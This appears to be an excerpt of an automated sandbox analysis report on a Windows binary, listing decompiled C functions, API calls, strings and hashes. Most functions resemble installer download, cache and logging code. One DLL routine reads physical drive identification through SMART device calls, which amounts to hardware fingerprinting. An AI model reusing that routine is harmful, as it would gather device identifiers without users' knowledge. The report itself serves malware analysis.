                                                                                                                                                                  • Opcode Fuzzy Hash: 2cd571c46d921342ae328bc226716b59bec4f1646cf6de2fc2b105e6fd3e42bb
                                                                                                                                                                  • Instruction Fuzzy Hash: 21328175F026388BCB248F15ED406EAB7B5FB06314F8841EAE40AE7A41D7349D81CF5A
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00425ADA, Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 149filenetworkCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 44%
                                                                                                                                                                  			E00425ADA(void* _a4, void* _a8, long _a12, void* _a16, intOrPtr _a20, intOrPtr _a24, void* _a28, long _a32, intOrPtr* _a36) {
				long _v8;
				signed int _v12;
				void* __ecx;
				signed short _t38;
				signed short _t49;
				signed int _t52;
				intOrPtr* _t53;
				void* _t55;
				void* _t57;
				void* _t65;
				signed int _t66;
				void* _t67;
				intOrPtr* _t74;
				void* _t77;

				_push(_t67);
				_push(_t67);
				_v8 = _v8 & 0x00000000;
				_t74 = _a12;
				_t77 = E00436FAF(_t67, _a8,  *_t74,  *((intOrPtr*)(_t74 + 4)), 0, 0);
				if(_t77 >= 0) {
					L3:
					while(InternetReadFile(_a4, _a28, _a32,  &_v8) != 0) {
						if(_v8 != 0) {
							_t65 = 0;
							_a12 = _a12 & 0;
							while(WriteFile(_a8, _a28 + _t65, _v8 - _t65,  &_a12, 0) != 0) {
								_t65 = _t65 + _a12;
								if(_a12 == 0 || _t65 >= _v8) {
									 *_t74 =  *_t74 + _t65;
									_t52 = 0;
									asm("adc [edi+0x4], eax");
									if(_a16 != 0xffffffff) {
										_t66 = _t52;
										_v12 = _t52;
										_t55 = E00436FAF(_t67, _a16, _t52, _t52, _t52, _t52);
										if(_t55 >= 0) {
											do {
												_push(0);
												_push( &_v12);
												_t57 = 8;
												WriteFile(_a16, _t74 + _t66 * 8, _t57 - _t66, ??, ??);
												_t66 = _t66 + _v12;
											} while (_v12 != 0 && _t66 < 8);
										} else {
											_push("Failed to seek to start point in file.");
											E00430A57();
											_t67 = _t55;
										}
									}
									_t53 = _a36;
									if(_t53 == 0 ||  *_t53 == 0) {
										L17:
										if(_v8 != 0) {
											goto L3;
										} else {
										}
									} else {
										_t77 = E00414038(_t53,  *_t74,  *((intOrPtr*)(_t74 + 4)), _a20, _a24, _a8);
										if(_t77 < 0) {
											_push("UX aborted on cache progress.");
											L22:
											_push(_t77);
											E00430A57();
										} else {
											goto L17;
										}
									}
								} else {
									continue;
								}
								goto L23;
							}
							_t49 = GetLastError();
							_t84 =  <=  ? _t49 : _t49 & 0x0000ffff | 0x80070000;
							_t77 =  >=  ? 0x80004005 :  <=  ? _t49 : _t49 & 0x0000ffff | 0x80070000;
							E004300D9(0x80004005, "downloadengine.cpp", 0x1bc, _t77);
							_push("Failed to write data from internet.");
							goto L22;
						}
						L23:
						goto L24;
					}
					_t38 = GetLastError();
					_t80 =  <=  ? _t38 : _t38 & 0x0000ffff | 0x80070000;
					_t77 =  >=  ? 0x80004005 :  <=  ? _t38 : _t38 & 0x0000ffff | 0x80070000;
					E004300D9(0x80004005, "downloadengine.cpp", 0x1b0, _t77);
					_push("Failed while reading from internet.");
					goto L22;
				} else {
					_push("Failed to seek to start point in file.");
					_push(_t77);
					E00430A57();
				}
				L24:
				return _t77;
			}

















                                                                                                                                                                  0x00425add
                                                                                                                                                                  0x00425ade
                                                                                                                                                                  0x00425adf
                                                                                                                                                                  0x00425ae5
                                                                                                                                                                  0x00425af9
                                                                                                                                                                  0x00425afd
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00425b12
                                                                                                                                                                  0x00425b31
                                                                                                                                                                  0x00425b37
                                                                                                                                                                  0x00425b39
                                                                                                                                                                  0x00425b3c
                                                                                                                                                                  0x00425b5f
                                                                                                                                                                  0x00425b66
                                                                                                                                                                  0x00425b6d
                                                                                                                                                                  0x00425b71
                                                                                                                                                                  0x00425b72
                                                                                                                                                                  0x00425b79
                                                                                                                                                                  0x00425b82
                                                                                                                                                                  0x00425b84
                                                                                                                                                                  0x00425b87
                                                                                                                                                                  0x00425b8e
                                                                                                                                                                  0x00425b9f
                                                                                                                                                                  0x00425b9f
                                                                                                                                                                  0x00425ba4
                                                                                                                                                                  0x00425ba7
                                                                                                                                                                  0x00425bb2
                                                                                                                                                                  0x00425bb8
                                                                                                                                                                  0x00425bbb
                                                                                                                                                                  0x00425b90
                                                                                                                                                                  0x00425b90
                                                                                                                                                                  0x00425b96
                                                                                                                                                                  0x00425b9c
                                                                                                                                                                  0x00425b9c
                                                                                                                                                                  0x00425b8e
                                                                                                                                                                  0x00425bc6
                                                                                                                                                                  0x00425bcb
                                                                                                                                                                  0x00425bec
                                                                                                                                                                  0x00425bf0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00425bf6
                                                                                                                                                                  0x00425bd2
                                                                                                                                                                  0x00425be6
                                                                                                                                                                  0x00425bea
                                                                                                                                                                  0x00425bf8
                                                                                                                                                                  0x00425c67
                                                                                                                                                                  0x00425c67
                                                                                                                                                                  0x00425c68
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00425bea
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00425b66
                                                                                                                                                                  0x00425bff
                                                                                                                                                                  0x00425c10
                                                                                                                                                                  0x00425c1a
                                                                                                                                                                  0x00425c28
                                                                                                                                                                  0x00425c2d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00425c2d
                                                                                                                                                                  0x00425c6f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00425c6f
                                                                                                                                                                  0x00425c34
                                                                                                                                                                  0x00425c45
                                                                                                                                                                  0x00425c4f
                                                                                                                                                                  0x00425c5d
                                                                                                                                                                  0x00425c62
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00425aff
                                                                                                                                                                  0x00425aff
                                                                                                                                                                  0x00425b04
                                                                                                                                                                  0x00425b05
                                                                                                                                                                  0x00425b0b
                                                                                                                                                                  0x00425c70
                                                                                                                                                                  0x00425c75

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00436FAF: SetFilePointerEx.KERNEL32(?,?,?,?,?,00000000,?,?,?,00412161,00000000,00000000,00000000,00000000,00000000), ref: 00436FC7
                                                                                                                                                                    • Part of subcall function 00436FAF: GetLastError.KERNEL32(?,?,?,00412161,00000000,00000000,00000000,00000000,00000000,?,00401414,00000000,?), ref: 00436FD1
                                                                                                                                                                  • InternetReadFile.WININET(?,?,?,00000000), ref: 00425B1F
                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,0042533F,?,?,?,?,?,00000000,?,00010000,?), ref: 00425B51
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$ErrorInternetLastPointerReadWrite
                                                                                                                                                                  • String ID: Failed to seek to start point in file.$Failed to write data from internet.$Failed while reading from internet.$UX aborted on cache progress.$downloadengine.cpp
                                                                                                                                                                  • API String ID: 1734627056-3175886020
                                                                                                                                                                  • Opcode ID: 5fd388c1c6299388a1f04bb7cd9e022af3dfafb6caba54791fdd93532f3080a0
                                                                                                                                                                  • Instruction ID: 65363c7b8b9019903e6d81b89b3821b77fad0723c48567d30cf1735180ee52de
                                                                                                                                                                  • Opcode Fuzzy Hash: 5fd388c1c6299388a1f04bb7cd9e022af3dfafb6caba54791fdd93532f3080a0
                                                                                                                                                                  • Instruction Fuzzy Hash: 92419132600725BFEB119E65EC45FAB7AA8EF04755F500227FD00E6190E778AD50DAA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004129F9, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135encryptionCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CryptHashPublicKeyInfo.CRYPT32(00000000,00008004,00000000,00000001,?,00000000,00000014), ref: 00412A69
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00412B35
                                                                                                                                                                    • Part of subcall function 00438141: CertGetCertificateContextProperty.CRYPT32(00000000,00000003,00000000,00000000), ref: 00438156
                                                                                                                                                                    • Part of subcall function 00438141: GetLastError.KERNEL32(?,?,00412AAC,?,00000003,00000000,00000000), ref: 00438160
                                                                                                                                                                  Strings
                                                                                                                                                                  • cache.cpp, xrefs: 00412B59
                                                                                                                                                                  • Failed to read certificate thumbprint., xrefs: 00412B2D
                                                                                                                                                                  • Failed to find expected public key in certificate chain., xrefs: 00412AFC
                                                                                                                                                                  • Failed to get certificate public key identifier., xrefs: 00412B63
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$CertCertificateContextCryptHashInfoPropertyPublic
                                                                                                                                                                  • String ID: Failed to find expected public key in certificate chain.$Failed to get certificate public key identifier.$Failed to read certificate thumbprint.$cache.cpp
                                                                                                                                                                  • API String ID: 1813738816-3408201827
                                                                                                                                                                  • Opcode ID: fec7dc94424385deb9900995774a9cf97171cbe8872712486e9f05ddb3da3a41
                                                                                                                                                                  • Instruction ID: a19f82367d5525c0bf468fc91e4de51159795ef4e0bb9282c6a0c5c6f73bd77f
                                                                                                                                                                  • Opcode Fuzzy Hash: fec7dc94424385deb9900995774a9cf97171cbe8872712486e9f05ddb3da3a41
                                                                                                                                                                  • Instruction Fuzzy Hash: 19417F72A002199FDB10DF69D981EEFB7F8BF08754F11402AE904EB251D678EC51CBA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004306F1, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129threadtimeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00457E88,00000000,00401C5F,?,?,?,004079F6,8007000D,Failed to find valid DOS image header in buffer.,section.cpp,0000005A,8007000D,?,?,?,00401C5F), ref: 0043071F
                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(00000000,?,004079F6,8007000D,Failed to find valid DOS image header in buffer.,section.cpp,0000005A,8007000D,?,?,?,00401C5F,77A19EB0,00000000), ref: 0043072F
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00430738
                                                                                                                                                                  • GetLocalTime.KERNEL32(8007000D,?,004079F6,8007000D,Failed to find valid DOS image header in buffer.,section.cpp,0000005A,8007000D,?,?,?,00401C5F,77A19EB0,00000000), ref: 0043074E
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00457E88,004079F6,00000000,00000000,0000FDE9), ref: 00430841
                                                                                                                                                                  Strings
                                                                                                                                                                  • %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls, xrefs: 004307E8
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalCurrentSection$EnterLeaveLocalProcessThreadTime
                                                                                                                                                                  • String ID: %ls[%04X:%04X][%04hu-%02hu-%02huT%02hu:%02hu:%02hu]%hs%03d:%ls %ls%ls
                                                                                                                                                                  • API String ID: 296830338-59366893
                                                                                                                                                                  • Opcode ID: ce6042b18dc24e00bf27926c5c8670c6af6f7ca955e1f79a9a4d7455feff7a8c
                                                                                                                                                                  • Instruction ID: 9c3281dea1d6eb25fbe06b0843c67677250ac65d488ff4d2e0b45fd5d339dd1b
                                                                                                                                                                  • Opcode Fuzzy Hash: ce6042b18dc24e00bf27926c5c8670c6af6f7ca955e1f79a9a4d7455feff7a8c
                                                                                                                                                                  • Instruction Fuzzy Hash: A441AD32A00219ABCB149BA9DC55BBFB7F8AB4C702F105177FA01E2251D73C9D44CBA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001D3D0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 97%
                                                                                                                                                                  			E1001D3D0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				void* _v8;
				struct _OVERLAPPED* _v12;
				intOrPtr _v16;
				signed int _v20;
				void* _v24;
				short _v540;
				char _v1564;
				long _v1568;
				long _v1572;
				intOrPtr _v1576;
				struct _OVERLAPPED* _v1580;
				struct _OVERLAPPED* _v1584;
				struct _OVERLAPPED* _v1588;
				struct _OVERLAPPED* _v1592;
				struct _OVERLAPPED* _v1596;
				struct _OVERLAPPED* _v1600;
				struct _OVERLAPPED* _v1604;
				void _v1608;
				void* __ebp;
				int _t63;
				void* _t64;
				int _t76;
				void* _t77;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;

				_t97 = __esi;
				_t96 = __edi;
				_t77 = __ebx;
				_v12 = 0;
				_v16 = _a4;
				_v1584 = 0;
				_v1580 = 0;
				do {
					wsprintfW( &_v540, L"\\\\.\\PhysicalDrive%d", _v12);
					_t99 = _t99 + 0xc;
					_v24 = CreateFileW( &_v540, 0xc0000000, 7, 0, 3, 0, 0);
					if(_v24 != 0xffffffff) {
						_v1572 = 0;
						_v1608 = 0;
						_v1604 = 0;
						_v1600 = 0;
						_v1596 = 0;
						_v1592 = 0;
						_v1588 = 0;
						_t63 = DeviceIoControl(_v24, 0x74080, 0, 0,  &_v1608, 0x18,  &_v1572, 0);
						__eflags = _t63;
						if(_t63 != 0) {
							_t64 = L1000CEAF(_t77,  &_v1608, _t96, _t97, 0x221);
							_t100 = _t99 + 4;
							_v8 = _t64;
							 *((char*)(_v8 + 0xa)) = 0xec;
							_v1568 = 0;
							__eflags = DeviceIoControl(_v24, 0x7c088, _v8, 0x21, _v8, 0x221,  &_v1568, 0);
							if(__eflags == 0) {
								L10:
								CloseHandle(_v24);
								_push(_v8);
								E1000CA40(_t77, _t96, _t97, __eflags);
								_t99 = _t100 + 4;
								__eflags = _v1584;
								if(_v1584 == 0) {
									_v12 = _v1580;
									goto L13;
								}
								break;
							}
							_v20 = 0;
							do {
								 *(_t98 + _v20 * 4 - 0x618) =  *(_v8 + 0x10 + _v20 * 2) & 0x0000ffff;
								_v20 = _v20 + 1;
								__eflags = _v20 - 0x100;
							} while (_v20 < 0x100);
							_v1576 = E1001CDD0( &_v1564);
							_t76 = E1001D000(_v1576, 0x104, _v16);
							_t100 = _t100 + 0x10;
							__eflags = _t76;
							if(__eflags == 0) {
								_v1584 = 1;
							}
							goto L10;
						}
						goto L13;
					}
					L13:
					_v12 =  &(_v12->Internal);
					_v1580 = _v12;
				} while (_v12 < 4);
				return _v1584;
			}































                                                                                                                                                                  0x1001d3d0
                                                                                                                                                                  0x1001d3d0
                                                                                                                                                                  0x1001d3d0
                                                                                                                                                                  0x1001d3d9
                                                                                                                                                                  0x1001d3e3
                                                                                                                                                                  0x1001d3e6
                                                                                                                                                                  0x1001d3f0
                                                                                                                                                                  0x1001d3fa
                                                                                                                                                                  0x1001d40a
                                                                                                                                                                  0x1001d410
                                                                                                                                                                  0x1001d42f
                                                                                                                                                                  0x1001d436
                                                                                                                                                                  0x1001d43d
                                                                                                                                                                  0x1001d447
                                                                                                                                                                  0x1001d451
                                                                                                                                                                  0x1001d45b
                                                                                                                                                                  0x1001d465
                                                                                                                                                                  0x1001d46f
                                                                                                                                                                  0x1001d479
                                                                                                                                                                  0x1001d4a2
                                                                                                                                                                  0x1001d4a8
                                                                                                                                                                  0x1001d4aa
                                                                                                                                                                  0x1001d4b6
                                                                                                                                                                  0x1001d4bb
                                                                                                                                                                  0x1001d4be
                                                                                                                                                                  0x1001d4c4
                                                                                                                                                                  0x1001d4c8
                                                                                                                                                                  0x1001d4f9
                                                                                                                                                                  0x1001d4fb
                                                                                                                                                                  0x1001d566
                                                                                                                                                                  0x1001d56a
                                                                                                                                                                  0x1001d573
                                                                                                                                                                  0x1001d574
                                                                                                                                                                  0x1001d579
                                                                                                                                                                  0x1001d57c
                                                                                                                                                                  0x1001d583
                                                                                                                                                                  0x1001d58d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001d58d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001d585
                                                                                                                                                                  0x1001d4fd
                                                                                                                                                                  0x1001d504
                                                                                                                                                                  0x1001d512
                                                                                                                                                                  0x1001d51f
                                                                                                                                                                  0x1001d522
                                                                                                                                                                  0x1001d522
                                                                                                                                                                  0x1001d53a
                                                                                                                                                                  0x1001d550
                                                                                                                                                                  0x1001d555
                                                                                                                                                                  0x1001d558
                                                                                                                                                                  0x1001d55a
                                                                                                                                                                  0x1001d55c
                                                                                                                                                                  0x1001d55c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001d55a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001d4ac
                                                                                                                                                                  0x1001d590
                                                                                                                                                                  0x1001d596
                                                                                                                                                                  0x1001d59c
                                                                                                                                                                  0x1001d5a2
                                                                                                                                                                  0x1001d5b5

                                                                                                                                                                  APIs
                                                                                                                                                                  • wsprintfW.USER32 ref: 1001D40A
                                                                                                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000003,00000000,00000000), ref: 1001D429
                                                                                                                                                                  • DeviceIoControl.KERNEL32 ref: 1001D4A2
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ControlCreateDeviceFilewsprintf
                                                                                                                                                                  • String ID: \\.\PhysicalDrive%d
                                                                                                                                                                  • API String ID: 3081802084-2935326385
                                                                                                                                                                  • Opcode ID: de9a76d0024823a394fdd4108f71e87b0028d34ecfefb80d4632e3eaefcbe126
                                                                                                                                                                  • Instruction ID: f26b544c4fccea81e18431b955f202ed2237751288ed87d0487abbb64b72177a
                                                                                                                                                                  • Opcode Fuzzy Hash: de9a76d0024823a394fdd4108f71e87b0028d34ecfefb80d4632e3eaefcbe126
                                                                                                                                                                  • Instruction Fuzzy Hash: 38512EB4D00218EFEB10DF94CC85BDEB7B5EB84704F104599E509AB280D7B6AB94CF95
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00413414, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108filestringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,?,*.*,?,?,?,00000000,.unverified,?,?,?,?), ref: 004134C4
                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?), ref: 004134EB
                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010,?,?,?), ref: 0041354B
                                                                                                                                                                  • FindClose.KERNEL32(00000000,?,?,?), ref: 00413556
                                                                                                                                                                    • Part of subcall function 0043740C: GetFileAttributesW.KERNEL32(004125A6,?,?,?,00000001,80004005,00000000), ref: 00437488
                                                                                                                                                                    • Part of subcall function 0043740C: GetLastError.KERNEL32(?,?,?,00000001,80004005,00000000), ref: 0043749B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileFind$AttributesCloseErrorFirstLastNextlstrlen
                                                                                                                                                                  • String ID: *.*$.unverified
                                                                                                                                                                  • API String ID: 457978746-2528915496
                                                                                                                                                                  • Opcode ID: 2cedae98c789e87417e67e658899332d430a0458b6f1c64e6e7fc651a14e29c2
                                                                                                                                                                  • Instruction ID: ab651e69853393a668d77da66f97a7cc02ec4ba4900980d1524a3a165d9222cc
                                                                                                                                                                  • Opcode Fuzzy Hash: 2cedae98c789e87417e67e658899332d430a0458b6f1c64e6e7fc651a14e29c2
                                                                                                                                                                  • Instruction Fuzzy Hash: A141653090056CAADF21AF64DC49BEE77B9AF44716F5001A6E509E10A1EB789FC48F5C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00402B28, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 51COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastNameUser
                                                                                                                                                                  • String ID: Failed to get the user name.$Failed to set variant value.$variable.cpp
                                                                                                                                                                  • API String ID: 2054405381-1522884404
                                                                                                                                                                  • Opcode ID: c72dd54c3adadfc8993b462ccf1a1ff414198a969e37ccbfcf6ab88439cfec3e
                                                                                                                                                                  • Instruction ID: 535dcb1110c6f9425801d7be22377e4e91bb77f3c55e3d018168205d3a37cd66
                                                                                                                                                                  • Opcode Fuzzy Hash: c72dd54c3adadfc8993b462ccf1a1ff414198a969e37ccbfcf6ab88439cfec3e
                                                                                                                                                                  • Instruction Fuzzy Hash: 4001C431A003286AC710AF65AC49B9F77B8AB08714F10026BE855F21C1DBB8A9004AE9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1000F05C, Relevance: 7.6, APIs: 5, Instructions: 57COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 85%
                                                                                                                                                                  			E1000F05C(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x103342d8; // 0x1cc83ef6
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x10335a58 = _t6;
				 *0x10335a54 = _t22;
				 *0x10335a50 = _t25;
				 *0x10335a4c = _t21;
				 *0x10335a48 = _t27;
				 *0x10335a44 = _t26;
				 *0x10335a70 = ss;
				 *0x10335a64 = cs;
				 *0x10335a40 = ds;
				 *0x10335a3c = es;
				 *0x10335a38 = fs;
				 *0x10335a34 = gs;
				asm("pushfd");
				_pop( *0x10335a68);
				 *0x10335a5c =  *_t31;
				 *0x10335a60 = _v0;
				 *0x10335a6c =  &_a4;
				 *0x103359a8 = 0x10001;
				_t11 =  *0x10335a60; // 0x0
				 *0x1033595c = _t11;
				 *0x10335950 = 0xc0000409;
				 *0x10335954 = 1;
				_t12 =  *0x103342d8; // 0x1cc83ef6
				_v812 = _t12;
				_t13 =  *0x103342dc; // 0xe337c109
				_v808 = _t13;
				 *0x103359a0 = IsDebuggerPresent();
				_push(1);
				E10013ABF(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x10024b30);
				if( *0x103359a0 == 0) {
					_push(1);
					E10013ABF(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                                                                                                                                                  0x1000f05c
                                                                                                                                                                  0x1000f05c
                                                                                                                                                                  0x1000f05c
                                                                                                                                                                  0x1000f05c
                                                                                                                                                                  0x1000f05c
                                                                                                                                                                  0x1000f05c
                                                                                                                                                                  0x1000f05c
                                                                                                                                                                  0x1000f062
                                                                                                                                                                  0x1000f064
                                                                                                                                                                  0x1000f064
                                                                                                                                                                  0x10016175
                                                                                                                                                                  0x1001617a
                                                                                                                                                                  0x10016180
                                                                                                                                                                  0x10016186
                                                                                                                                                                  0x1001618c
                                                                                                                                                                  0x10016192
                                                                                                                                                                  0x10016198
                                                                                                                                                                  0x1001619f
                                                                                                                                                                  0x100161a6
                                                                                                                                                                  0x100161ad
                                                                                                                                                                  0x100161b4
                                                                                                                                                                  0x100161bb
                                                                                                                                                                  0x100161c2
                                                                                                                                                                  0x100161c3
                                                                                                                                                                  0x100161cc
                                                                                                                                                                  0x100161d4
                                                                                                                                                                  0x100161dc
                                                                                                                                                                  0x100161e7
                                                                                                                                                                  0x100161f1
                                                                                                                                                                  0x100161f6
                                                                                                                                                                  0x100161fb
                                                                                                                                                                  0x10016205
                                                                                                                                                                  0x1001620f
                                                                                                                                                                  0x10016214
                                                                                                                                                                  0x1001621a
                                                                                                                                                                  0x1001621f
                                                                                                                                                                  0x1001622b
                                                                                                                                                                  0x10016230
                                                                                                                                                                  0x10016232
                                                                                                                                                                  0x1001623a
                                                                                                                                                                  0x10016245
                                                                                                                                                                  0x10016252
                                                                                                                                                                  0x10016254
                                                                                                                                                                  0x10016256
                                                                                                                                                                  0x1001625b
                                                                                                                                                                  0x1001626f

                                                                                                                                                                  APIs
                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 10016225
                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1001623A
